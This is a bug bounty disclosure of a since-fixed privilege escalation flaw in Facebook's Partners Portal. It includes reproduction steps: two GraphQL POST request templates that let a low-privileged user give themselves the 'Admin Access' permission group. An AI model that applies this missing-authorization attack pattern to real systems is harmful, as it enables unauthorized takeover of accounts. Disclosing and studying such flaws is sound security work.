Description
This bug could allow a malicious user with low permissions in a “Partners Portal” account, to upgrade his access to full admin permissions. This may help him to take full control to delete other admins or have read/write capabilities to do certain actions that may damage the enterprise depending on the portal type (FBS , OPP or Mobile …)
Reproduction
1) Send a POST request to https://www.facebook.com/api/graphql/ with cookies that belongs to a user who has limited access to a Partners Portal account. with those parameters in the body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=REDACTED&
variables={"id":"PARTNER_ID","partner_type":"PARTNER_TYPE"}
PARTNER_ID : targeted partner account id.
PARTNER_TYPE : targeted partner portal account type (eg: fbs, xpp, opp)
This should return a list of permissions groups. The attack get the id associated to the “Admin Access” group which is a group with full permissions. we’ll note this permission group id as Permission_Group
2) Send a POST request to https://www.facebook.com/api/graphql/ with cookies that belongs to a user who has limited access to a Partners Portal account. with those parameters in the body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=REDACTED&
variables={"existing_partner_ids":PARTNER_ID,"email":"ATTACKER_EMAIL","user_id":ATTACKER_USER_ID,"group_ids":PERMISSION_GROUP}
PARTNER_ID : Targeted partner account id.
ATTACKER_EMAIL : Email address associated to the attacker account in the portal.
ATTACKER_USER_ID : ID of the Facebook account of the attacker
Permission_Group : ID of the “Admin Access” permission group
The response to this request would be (“update_user_permissions”: true). This request would work too to change the permissions to other admin accounts even if our account doesn’t have permissions to update them.
Impact
A low-privileged Partner Portal account user can escalate their privileges to the highest/admin level.
Timeline
Feb 5, 2020 — Report Sent
Feb 7, 2020 — Acknowledged by Facebook
Feb 24, 2020 — Fixed by Facebook
Feb 26, 2020 — Bounty awarded by Facebook